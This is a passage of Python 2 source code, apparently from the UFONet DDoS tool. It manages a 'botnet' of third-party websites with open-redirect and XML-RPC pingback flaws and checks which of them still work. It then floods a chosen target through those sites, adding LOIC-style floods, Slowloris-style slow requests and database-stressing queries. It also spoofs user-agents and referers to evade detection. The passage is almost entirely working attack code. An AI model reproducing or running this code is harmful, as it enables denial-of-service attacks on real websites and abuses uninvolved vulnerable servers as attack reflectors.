 2317. zombie = zombie.split(sep, 1)[0]
 2318. reply = str(self.connect_zombie(zombie))
 2319. if reply == "200" or reply == "302" or reply == "301" or reply == "401" or reply == "403" or reply == "405" or reply == '500':
 2320. status = "ONLINE!"
 2321. zombies_online = zombies_online + 1
 2322. else:
 2323. status = "NOT Working!"
 2324. zombies_offline = zombies_offline + 1
 2325. print "\nName:", name_zombie
 2326. print "Type: [", zombie_type, "]"
 2327. print "Vector:", zombie
 2328. print "HTTP Code:", reply
 2329. print "STATUS:", status
 2330. print '-'*21
 2331. if status == "NOT Working!": # add to discarded zombies
 2332. if zombie not in discarded:
 2333. discarded.append(zombie)
 2334. print "\n" + '='*52
 2335. print "\n+ Total Botnet:", len(botnet)
 2336. print "\n" + '-'*25 + "\n"
 2337. print " - ONLINE:", zombies_online
 2338. print " - OFFLINE:", zombies_offline, "\n"
 2339. print '='*52 + '\n'
 2340. self.head = False
 2341. if zombies_offline > 0:
 2342. if not self.options.forceyes:
 2343. test_reply = raw_input("Want to update your army? (Y/n)\n")
 2344. print '-'*25 + "\n"
 2345. else:
 2346. test_reply = "Y"
 2347. if test_reply == "n" or test_reply == "N":
 2348. print "Bye!\n"
 2349. return
 2350. else:
 2351. disc_zombies = self.discard_zombies(discarded) # discard zombies from botnet (remove from files)
 2352. print '='*52
 2353. print "\n - DISCARDED:", disc_zombies
 2354. new_botnet = int(len(botnet) - disc_zombies)
 2355. print "\n+ New Total Botnet:", str(new_botnet), "\n"
 2356. print '='*52 + '\n'
 2357. else:
 2358. print "[Info] ALL checked 'zombies' are ONLINE... Exiting!\n"
 2359. def discard_zombies(self, discarded):
 2360. disc_zombies = 0
 2361. zombies_list = [self.zombies_file, self.aliens_file, self.droids_file, self.ucavs_file, self.rpcs_file]
 2362. for l in zombies_list:
 2363. f = open(l, "r+")
 2364. d = f.readlines()
 2365. f.close()
 2366. f = open(l, "w")
 2367. disc_zombies = self.remove_discarded_zombies(f, d, discarded, disc_zombies)
 2368. f.close()
 2369. return disc_zombies
 2370. def remove_discarded_zombies(self, f, d, discarded, disc_zombies):
 2371. m = []
 2372. for zombie_disc in discarded:
 2373. if zombie_disc.endswith(os.linesep):
 2374. zombie_disc = zombie_disc.replace(os.linesep, "")
 2375. elif zombie_disc.endswith("\r"):
 2376. zombie_disc = zombie_disc.replace("\r", "")
 2377. elif zombie_disc.endswith("\r" + os.linesep):
 2378. zombie_disc = zombie_disc.replace("\r" + os.linesep, "")
 2379. for z in d:
 2380. if z.endswith(os.linesep):
 2381. z = z.replace(os.linesep, "")
 2382. elif z.endswith("\r"):
 2383. z = z.replace("\r", "")
 2384. elif z.endswith("\r" + os.linesep):
 2385. z = z.replace("\r" + os.linesep, "")
 2386. if z == zombie_disc:
 2387. disc_zombies = disc_zombies + 1
 2388. else:
 2389. if z not in m and z not in discarded:
 2390. m.append(z)
 2391. if not m:
 2392. f.write("")
 2393. else:
 2394. for z in m:
 2395. f.write(z+os.linesep)
 2396. return disc_zombies
 2397. def testing_rpcs(self, rpcs):
 2398. # discover/test XML-RPC Pingback vulnerabilities on webapps (Wordpress, Drupal, PostNuke, b2evolution,
 2399. # Xoops, PHPGroupWare, TikiWiki, etc...) and update list
 2400. if self.options.testall: #testing_all
 2401. print '='*51
 2402. print ("Are 'plasma' reflectors ready? :-) (XML-RPC Check):")
 2403. print '='*51
 2404. num_active_rpcs = 0
 2405. num_failed_rpcs = 0
 2406. rpcs_ready = []
 2407. print "Trying:", len(rpcs)
 2408. print '-'*21
 2409. for rpc in rpcs:
 2410. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2411. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2412. if rpc.startswith("http://") or rpc.startswith("https://"):
 2413. print "Searching 'Pingback' on", rpc
 2414. rpc_host = rpc.replace("/xmlrpc.php", "")
 2415. rpc_vulnerable, rpc_pingback_url = self.search_rpc(rpc_host)
 2416. if rpc_vulnerable == True: # discover XML-RPC system.listMethods allowed
 2417. rpc_methods = "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>"
 2418. try:
 2419. req = urllib2.Request(rpc_pingback_url, rpc_methods, headers)
 2420. target_reply = urllib2.urlopen(req, context=self.ctx).read()
 2421. if self.options.verbose:
 2422. print "Reply:", target_reply
 2423. if "pingback.ping" in target_reply: # XML-RPC pingback.ping method is allowed!
 2424. print "\n[Info] It looks VULNERABLE !!! ;-)"
 2425. rpcs_ready.append(rpc_pingback_url) # save XML-RPC path as RPC zombie
 2426. num_active_rpcs = num_active_rpcs + 1 # add fail to rpcs stats
 2427. else:
 2428. print "\n[Info] It is NOT vulnerable..."
 2429. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 2430. except:
 2431. print "[Error] X-RPC: " + rpc + " -> FAILED (cannot connect!)"
 2432. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 2433. else:
 2434. print "\n[Info] It is NOT vulnerable..."
 2435. num_failed_rpcs = num_failed_rpcs + 1 # add fail to rpcs stats
 2436. print '-'*10
 2437. print '='*18
 2438. print "OK:", num_active_rpcs, "Fail:", num_failed_rpcs
 2439. print '='*18
 2440. if self.options.testall: # testing_all
 2441. return rpcs_ready, num_active_rpcs, num_failed_rpcs
 2442. else:
 2443. # update 'rpcs' list
 2444. if num_active_rpcs == 0:
 2445. print "\n[Info] - Not any vulnerable 'rpc' active!\n"
 2446. return #sys.exit(2)
 2447. else:
 2448. if not self.options.forceyes:
 2449. update_reply = raw_input("Want to update your army? (Y/n)")
 2450. print '-'*25
 2451. else:
 2452. update_reply = "Y"
 2453. if update_reply == "n" or update_reply == "N":
 2454. print "\nBye!\n"
 2455. return #sys.exit(2)
 2456. else:
 2457. self.update_rpcs(rpcs_ready)
 2458. if not self.options.upload:
 2459. print "\n[Info] - Botnet updated! ;-)\n"
 2460. def testing(self, zombies):
 2461. # test Open Redirect vulnerabilities on webapps and show statistics
 2462. # HTTP HEAD check
 2463. army = 0
 2464. print ("Are 'they' alive? :-) (HEAD Check):")
 2465. print '='*35
 2466. num_active_zombies = 0
 2467. num_failed_zombies = 0
 2468. active_zombies = []
 2469. print "Trying:", len(zombies)
 2470. print '-'*21
 2471. for zombie in zombies:
 2472. zombie = str(zombie)
 2473. if zombie.startswith("http://") or zombie.startswith("https://"):
 2474. # send HEAD connection
 2475. self.head = True
 2476. reply = self.connect_zombies(zombie)
 2477. while self.herd.no_more_zombies() == False:
 2478. time.sleep(1)
 2479. for zombie in self.herd.done:
 2480. zombie = str(zombie)
 2481. t = urlparse(zombie)
 2482. if self.herd.get_result(zombie):
 2483. code_reply = self.herd.get_result(zombie)
 2484. self.head = False
 2485. if code_reply == "200" or code_reply == "302" or code_reply == "301" or code_reply == "401" or code_reply == "403" or code_reply == "405":
 2486. name_zombie = t.netloc
 2487. print "Zombie:", name_zombie
 2488. print "Status: Ok ["+ code_reply + "]"
 2489. num_active_zombies = num_active_zombies + 1
 2490. active_zombies.append(zombie)
 2491. elif code_reply == "404":
 2492. print "Zombie:", t.netloc
 2493. print "Status: Not Found ["+ code_reply + "]"
 2494. num_failed_zombies = num_failed_zombies + 1
 2495. else:
 2496. print "Zombie:", t.netloc, "\nVector:", zombie
 2497. print "Status: Not Allowed ["+ code_reply + "]"
 2498. num_failed_zombies = num_failed_zombies + 1
 2499. else:
 2500. if self.options.verbose:
 2501. print "Reply:", "\n\nNothing!!!!!\n"
 2502. print "Zombie:", zombie
 2503. print "Status: Malformed!"
 2504. num_failed_zombies = num_failed_zombies + 1
 2505. print '-'*10
 2506. self.herd.reset()
 2507. print '='*18
 2508. print "OK:", num_active_zombies, "Fail:", num_failed_zombies
 2509. print '='*18 + "\n"
 2510. print '='*22
 2511. # check url parameter vectors
 2512. print ("Checking for payloads:")
 2513. print '='*22
 2514. print "Trying:", num_active_zombies
 2515. print '-'*21
 2516. zombies_ready = []
 2517. num_waiting_zombies = 0
 2518. if num_active_zombies == 0:
 2519. num_disconnected_zombies = num_failed_zombies
 2520. else:
 2521. num_disconnected_zombies = 0
 2522. for zombie in active_zombies:
 2523. zombie = str(zombie)
 2524. t = urlparse(zombie)
 2525. name_zombie = t.netloc
 2526. self.payload = True
 2527. try:
 2528. self.connect_zombies(zombie)
 2529. except:
 2530. pass
 2531. self.payload = False
 2532. time.sleep(1)
 2533. while self.herd.no_more_zombies() == False:
 2534. time.sleep(1)
 2535. for zombie in self.herd.done:
 2536. zombie = str(zombie)
 2537. t = urlparse(zombie)
 2538. name_zombie = t.netloc
 2539. payload_zombie = zombie
 2540. payload_reply = ""
 2541. print "Vector:", payload_zombie
 2542. self.payload = True
 2543. if self.herd.get_result(zombie):
 2544. payload_reply = self.herd.get_result(zombie)
 2545. self.payload = False
 2546. if "https://www.whitehouse.gov" in payload_reply: #Open Redirect reply [requested by all UFONet motherships ;-)]
 2547. num_waiting_zombies = num_waiting_zombies + 1
 2548. print "Status:", "Waiting for orders..."
 2549. zombies_ready.append(zombie)
 2550. else:
 2551. num_disconnected_zombies = num_disconnected_zombies + 1
 2552. print "Status:", "Not ready..."
 2553. army = army + 1
 2554. print '-'*10
 2555. self.herd.reset()
 2556. print '='*18
 2557. print "OK:", num_waiting_zombies, "Fail:", num_disconnected_zombies
 2558. print '='*18 + "\n"
 2559. # list of 'zombies' ready to attack
 2560. num_active_zombie = 0
 2561. for z in zombies_ready:
 2562. t = urlparse(z)
 2563. name_zombie = t.netloc
 2564. num_active_zombie = num_active_zombie + 1
 2565. if self.options.verbose:
 2566. print "Zombie [", num_active_zombie, "]:", name_zombie + "\n"
 2567. if self.options.testall: # testing_all
 2568. return zombies_ready, num_waiting_zombies, num_disconnected_zombies + num_failed_zombies
 2569. else:
 2570. print '-'*25 + "\n"
 2571. print '='*24
 2572. print "Working 'zombies':", num_active_zombie
 2573. print '='*24
 2574. if not self.options.forceyes:
 2575. update_reply = raw_input("\nWant to update your army? (Y/n)")
 2576. print '-'*25
 2577. else:
 2578. update_reply = "Y"
 2579. if update_reply == "n" or update_reply == "N":
 2580. print "\nBye!\n"
 2581. return #sys.exit(2)
 2582. else:
 2583. self.update_zombies(zombies_ready)
 2584. if not self.options.upload:
 2585. print "\n[Info] - Botnet updated! ;-)\n"
 2586. self.update_scanner_stats(self.scanned_zombies) # update json file with scanner stats (found via dorking)
 2587. def testing_all(self):
 2588. # test whole botnet
 2589. print ("\nChecking if ALL your zombies are still infected (WARNING: this may take serveral time!)\n")
 2590. print '='*35
 2591. zombies = self.extract_zombies()
 2592. rpcs = self.extract_rpcs()
 2593. aliens = self.extract_aliens()
 2594. droids = self.extract_droids()
 2595. ucavs = self.extract_ucavs()
 2596. try:
 2597. botnet = zombies + rpcs + aliens + droids + ucavs
 2598. tested_zombies = zombies + rpcs # test types supported: zombies + xml-rpcs
 2599. except:
 2600. return
 2601. zombies_ready, num_waiting_zombies, num_disconnected_zombies = self.testing(zombies)
 2602. rpcs_ready, num_active_rpcs, num_failed_rpcs = self.testing_rpcs(rpcs)
 2603. print "\n" + '='*52
 2604. print "\n+ Total Botnet:", len(botnet)
 2605. print "\n" + '-'*25
 2606. print "\n+ Total Tested:", len(tested_zombies)
 2607. print "\n - Zombies :", len(zombies), " [ OK:", str(num_waiting_zombies), "| FAILED:", str(num_disconnected_zombies), "]"
 2608. print " - XML-RPCs:", len(rpcs), " [ OK:", str(num_active_rpcs), "| FAILED:", str(num_failed_rpcs), "]" + "\n"
 2609. print '='*52 + '\n'
 2610. if num_disconnected_zombies > 0 or num_failed_rpcs > 0:
 2611. if not self.options.forceyes:
 2612. update_reply = raw_input("Want to update your army? (Y/n)")
 2613. print '-'*25
 2614. else:
 2615. update_reply = "Y"
 2616. if update_reply == "n" or update_reply == "N":
 2617. print "\nBye!\n"
 2618. return #sys.exit(2)
 2619. else:
 2620. if num_disconnected_zombies > 0:
 2621. self.update_zombies(zombies_ready)
 2622. if num_failed_rpcs > 0:
 2623. self.update_rpcs(rpcs_ready)
 2624. if not self.options.upload:
 2625. print "\n[Info] - Botnet updated! ;-)\n"
 2626. else:
 2627. print "[Info] ALL tested 'zombies' are working... Exiting!\n"
 2628. def attacking(self, zombies):
 2629. # perform a DDoS Web attack against a target, using Open Redirect vectors (and other Web Abuse services) as 'zombies'
 2630. target = self.options.target
 2631. if target.startswith("https://"):
 2632. target = target.replace("https://", "http://") # change target to 'http' (to evade a possible invalid SSL certificate)
 2633. if target.startswith("http://"):
 2634. print "Attacking: ", target
 2635. print '='*55, "\n"
 2636. # send Open Redirect injection (multiple zombies > one target url)
 2637. reply = self.injection(target, zombies)
 2638. else:
 2639. print "\n[Error] - Target url not valid! -> It should starts with 'http(s)://'\n"
 2640. def stressing(self, target, zombie):
 2641. # perform a DDoS Web attack against a target, requesting records on target's database
 2642. db_input = self.options.dbstress
 2643. def random_key(length):
 2644. key = ''
 2645. for i in range(length):
 2646. key += random.choice(string.lowercase + string.uppercase + string.digits)
 2647. return key
 2648. # generating random alphanumeric queries
 2649. if self.db_flash > 9: # set db flash start on: 10
 2650. length = 1024 # search a heavy random length query (db flash): 1024
 2651. self.db_flash = 0 # reset db flash counter
 2652. else:
 2653. length = 1 # search for one different (alphanumeric) character each time will produces more positive results on db
 2654. key = str(random_key(length))
 2655. if self.db_flash > 9:
 2656. print "\n[Info] Trying database request to: " + db_input + " | Query used: db flash! " + "(" + str(length) + " chars)"
 2657. else:
 2658. print "\n[Info] Trying database request to: " + db_input + " | Query used: " + key
 2659. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2660. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2661. if not target.endswith('/'): # add "/" to end of target
 2662. target = target + "/"
 2663. url = zombie + target + db_input + key
 2664. req = urllib2.Request(url, None, headers)
 2665. try:
 2666. req_reply = urllib2.urlopen(req).read()
 2667. except urllib2.HTTPError, e:
 2668. if e.code == 401:
 2669. print '[Info] Not authorized'
 2670. elif e.code == 404:
 2671. print '[Info] Not found'
 2672. elif e.code == 503:
 2673. print '[Info] Service unavailable'
 2674. else:
 2675. print '[Info] Unknown error'
 2676. else:
 2677. print '[Info] DB query: Hit!'
 2678. def attackme(self, zombies):
 2679. # perform a DDoS Web attack against yourself
 2680. print "Starting local port to listening at: " + self.port + "\n"
 2681. print '='*21 + "\n"
 2682. self.doll=Doll(self)
 2683. self.doll.start()
 2684. while not self.doll._armed:
 2685. time.sleep(1)
 2686. # send Open Redirect injection (multiple zombies-multiple target urls)
 2687. target = ""
 2688. self.injection(target, zombies)
 2689. self.doll.shutdown()
 2690. self.doll.join()
 2691. self.herd.list_fails()
 2692. def injection(self, target, zombies, head_check = True):
 2693. options = self.options
 2694. head_check_here = False
 2695. head_check_external = False
 2696. print '='*21
 2697. if options.disablehead: # check at start is disabled (skipping!)
 2698. print "\n[Info] Skipping external check of target's status...\n"
 2699. head_check_here = True
 2700. head_check_external = True
 2701. else:
 2702. if head_check:
 2703. if not options.attackme:
 2704. print "Round: 'Is target up?'"
 2705. print '='*21
 2706. try: # send HEAD connection
 2707. self.head = True
 2708. reply = self.connect_zombie(target)
 2709. self.head = False
 2710. if reply:
 2711. print "[Info] From here: YES"
 2712. head_check_here = True
 2713. else:
 2714. print "[Info] From Here: NO | Report: From here your target looks DOWN!"
 2715. head_check_here = False
 2716. except Exception:
 2717. print "[Error] From Here: NO | Report: Check failed from your connection..."
 2718. if self.options.verbose:
 2719. traceback.print_exc()
 2720. head_check_here = False
 2721. else: # check if local IP/PORT is listening on mothership
 2722. print "Round: 'Is NAT ready?'"
 2723. print '='*21
 2724. try:
 2725. sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
 2726. result = sock.connect_ex(('0.0.0.0',8080))
 2727. if result == 0 or result == 110: # tmp black magic
 2728. print "[Info] Local port: YES | Report: Mothership accesible on -private- IP: http://0.0.0.0:8080"
 2729. head_check_here = True
 2730. else:
 2731. print "[Error] Local port: NO | Report: Something wrong on your port: 8080"
 2732. head_check_here = False
 2733. except Exception:
 2734. print "[Error] Local port: NO | Report: Something wrong checking open port ;("
 2735. if self.options.verbose:
 2736. traceback.print_exc()
 2737. head_check_here = False
 2738. print '-'*21
 2739. else:
 2740. head_check_here = True
 2741. # check target on third part service
 2742. self.external = True
 2743. if not options.attackme:
 2744. try:
 2745. external_reply = self.connect_zombie(target)
 2746. if "It's just you" in external_reply: # parse from external service: http://www.downforeveryoneorjustme.com
 2747. print "[Info] From exterior: YES"
 2748. head_check_external = True
 2749. else: # parse from external service: http://isup.me
 2750. url = "http://isup.me/" + target
 2751. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2752. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2753. req = urllib2.Request(url, None, headers)
 2754. req_reply = urllib2.urlopen(req).read()
 2755. if 'is up' in req_reply: # parse external service for reply
 2756. print "[Info] From exterior: YES"
 2757. head_check_external = True
 2758. else:
 2759. print "[Info] From exterior: NO | Report: From external services your target looks DOWN!"
 2760. head_check_external = False
 2761. except Exception:
 2762. print "[Error] From exterior: NO | Cannot reach external services from your network..."
 2763. head_check_external = False
 2764. else:
 2765. try: # check mothership from public ip / NAT using HEAD request
 2766. try:
 2767. conn = httplib.HTTPConnection(str(self.pub_ip), 8080, timeout=10)
 2768. conn.request("HEAD", "/")
 2769. reply = conn.getresponse()
 2770. except Exception:
 2771. reply = None
 2772. if reply:
 2773. print "[Info] From exterior: YES | Report: Mothership accesible from Internet ;-)"
 2774. head_check_external = True
 2775. else:
 2776. print "[Error] From exterior: NO | Report: Cannot access to mothership on -public- url:", target
 2777. head_check_external = False
 2778. head_check_here = False # stop attack if not public IP available
 2779. except Exception:
 2780. print "[Error] From exterior: NO | Report: Check failed from your connection..."
 2781. head_check_here = False # stop attack if not public IP available
 2782. if self.options.verbose:
 2783. traceback.print_exc()
 2784. head_check_external = False
 2785. print '-'*21
 2786. self.external = False
 2787. # ask for start the attack
 2788. if head_check_here == True or head_check_external == True:
 2789. if not self.options.forceyes:
 2790. if not options.attackme:
 2791. if not options.disablehead:
 2792. start_reply = raw_input("[Info] Your target looks ONLINE!. Want to start a DDoS attack? (y/N)\n")
 2793. else:
 2794. start_reply = raw_input("[Info] Want to start a DDoS attack directly? (y/N)\n")
 2795. else:
 2796. if not options.disablehead:
 2797. start_reply = raw_input("[Info] Your mothership looks READY!. Want to start a DDoS attack against yourself? (y/N)\n")
 2798. else:
 2799. start_reply = raw_input("[Info] Want to start a DDoS attack against yourself directly? (y/N)\n")
 2800. else:
 2801. start_reply = "Y"
 2802. if start_reply == "y" or start_reply == "Y":
 2803. if options.attackme:
 2804. total_rounds = "2" # default rounds for attackme
 2805. else:
 2806. total_rounds = options.rounds # extract number of rounds
 2807. if total_rounds <= "0":
 2808. total_rounds = "1"
 2809. self.herd.cleanup()
 2810. num_round = 1
 2811. num_hits = 0
 2812. num_zombie = 1
 2813. # start multi-threading DoS Web LOIC (Low Orbit Ion Cannon) with proxy support, if required
 2814. if self.options.loic:
 2815. try:
 2816. self.options.loic = int(self.options.loic)
 2817. except:
 2818. self.options.loic = 100 # default LOIC requests
 2819. if self.options.loic < 1:
 2820. self.options.loic = 100 # default LOIC requests
 2821. self.instance = LOIC() # instance main class for LOIC operations
 2822. t = threading.Thread(target=self.instance.attacking, args=(target, self.options.loic, self.options.proxy)) # attack with LOIC
 2823. t.daemon = True
 2824. t.start()
 2825. self.update_loic_stats() # add new LOIC attack to mothership
 2826. # start multi-threading DoS Slow+Poison HTTP requests (UFOLoris)
 2827. if self.options.slow:
 2828. try:
 2829. self.options.slow = int(self.options.slow)
 2830. except:
 2831. self.options.slow = 101 # default UFOLoris requests (apache -> max_clients: ~100 | nginx -> no limit (other method))
 2832. if self.options.slow < 1:
 2833. self.options.slow = 101 # default UFOLoris requests
 2834. self.instance = LORIS() # instance main class for UFOLoris operations
 2835. t = threading.Thread(target=self.instance.attacking, args=(target, self.options.slow)) # attack with UFOLoris
 2836. t.daemon = True
 2837. t.start()
 2838. self.update_loris_stats() # add new LORIS attack to mothership
 2839. time.sleep(5)
 2840. # start to attack the target with each zombie
 2841. zombies = self.extract_zombies() # extract zombies from file
 2842. total_zombie = len(zombies)
 2843. self.herd=Herd(self)
 2844. for i in range(0, int(total_rounds)):
 2845. print ("\x1b[2J\x1b[H")# clear screen (black magic)
 2846. print '='*42
 2847. print 'Starting round:', num_round, ' of ', total_rounds
 2848. print '='*42
 2849. if not self.options.disablealiens and not self.options.attackme: # different layers requests -> pure web abuse
 2850. send_aliens = self.send_aliens(target)
 2851. if not self.options.disabledroids and not self.options.attackme: # GET (with parameter required) requests
 2852. send_droids = self.send_droids(target)
 2853. if not self.options.disablerpcs and not self.options.attackme: # exploit XML-RPC pingback vulnerability
 2854. send_rpcs = self.send_rpcs(target)
 2855. shuffle(zombies) # suffle zombies order, each round :-)
 2856. self.herd.reset()
 2857. print "\n[Info] Sending your 'herd' of zombies...\n"
 2858. for zombie in zombies:
 2859. t = urlparse(zombie)
 2860. name_zombie = t.netloc
 2861. if not self.options.attackme:
 2862. print "[Info] Attacking from: " + name_zombie
 2863. else: # on attackme target url is dynamic -> http://public_ip:port/hash|zombie
 2864. self.mothership_hash = random.getrandbits(128) # generating random evasion hash
 2865. target = "http://" + str(self.pub_ip) + ":" + self.port + "/"+ str(self.mothership_hash) + "|" + zombie
 2866. self.options.target = target
 2867. print "Attacking: " + str(self.pub_ip) + ":" + self.port + " -> [LAN]" + self.local_ip + ":" + self.port
 2868. print "Payload: " + target
 2869. print '='*55, "\n"
 2870. self.attack_mode = True
 2871. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2872. if not options.target.startswith('http'):
 2873. options.target = "http://" + options.target
 2874. self.connect_zombies(zombie)
 2875. if self.options.dbstress: # try to stress db on target by using vulnerable Open Redirect web servers
 2876. self.db_flash = self.db_flash + 1
 2877. stress = self.stressing(target, zombie)
 2878. time.sleep(1)
 2879. for zombie in self.herd.done:
 2880. if self.herd.connection_failed(zombie) == False:
 2881. num_hits = num_hits + 1
 2882. num_zombie = num_zombie + 1
 2883. if num_zombie > total_zombie:
 2884. num_zombie = 1
 2885. while self.herd.no_more_zombies() == False:
 2886. time.sleep(1)
 2887. num_round = num_round + 1
 2888. if not self.options.disableisup and not self.options.attackme: # perform an external 'is target up?' check
 2889. check_is_up = self.check_is_up(target)
 2890. print "-"*21
 2891. self.herd.dump_html()
 2892. attack_mode = False
 2893. print ("\x1b[2J\x1b[H") # black magic
 2894. if not self.options.attackme: # show herd results
 2895. self.herd.dump()
 2896. else: # show doll results
 2897. print '='*21
 2898. print "\n[Info] - Mothership transmission...\n"
 2899. num_real_zombies = len(self.doll.real_zombies)
 2900. print "Total 'zombies' 100% vulnerable to Open Redirect (CWE-601): " + str(num_real_zombies) + "\n"
 2901. for z in self.doll.real_zombies: # show only alien verified zombies
 2902. for x in z:
 2903. print " - " + str(x)
 2904. self.herd.dump_html(True) # show (all) zombies statistics
 2905. if not self.options.attackme:
 2906. print "\n[Info] - Attack completed! ;-)\n"
 2907. self.update_mothership_stats() # update mothership stats
 2908. else:
 2909. if num_real_zombies < 1: # not any 100% vulnerable zombie found
 2910. print "\n[Info] - Not any 100% vulnerable zombie found... Bye!\n"
 2911. if os.path.exists('mothership') == True:
 2912. os.remove('mothership') # remove mothership stream
 2913. if os.path.exists('alien') == True:
 2914. os.remove('alien') # remove random alien worker
 2915. sys.exit(2)
 2916. else:
 2917. print "\nBye!\n"
 2918. if os.path.exists('mothership') == True:
 2919. os.remove('mothership') # remove mothership stream
 2920. if os.path.exists('alien') == True:
 2921. os.remove('alien') # remove random alien worker
 2922. if not options.web:
 2923. sys.exit(2) # exit
 2924. else:
 2925. return
 2926. else:
 2927. if not options.attackme:
 2928. print "[Info] Your target ("+target+") is OFFLINE!! ;-)"
 2929. else:
 2930. print "[Error] Your NAT/Network is not correctly configurated..."
 2931. print '-'*25
 2932. print "\nBye!\n"
 2933. if os.path.exists('mothership') == True:
 2934. os.remove('mothership') # remove mothership stream
 2935. if os.path.exists('alien') == True:
 2936. os.remove('alien') # remove random alien worker
 2937. if not options.web:
 2938. sys.exit(2) # exit
 2939. else:
 2940. return
 2941. if __name__ == "__main__":
 2942. app = UFONet()
 2943. options = app.create_options()
 2944. if options:
 2945. app.run()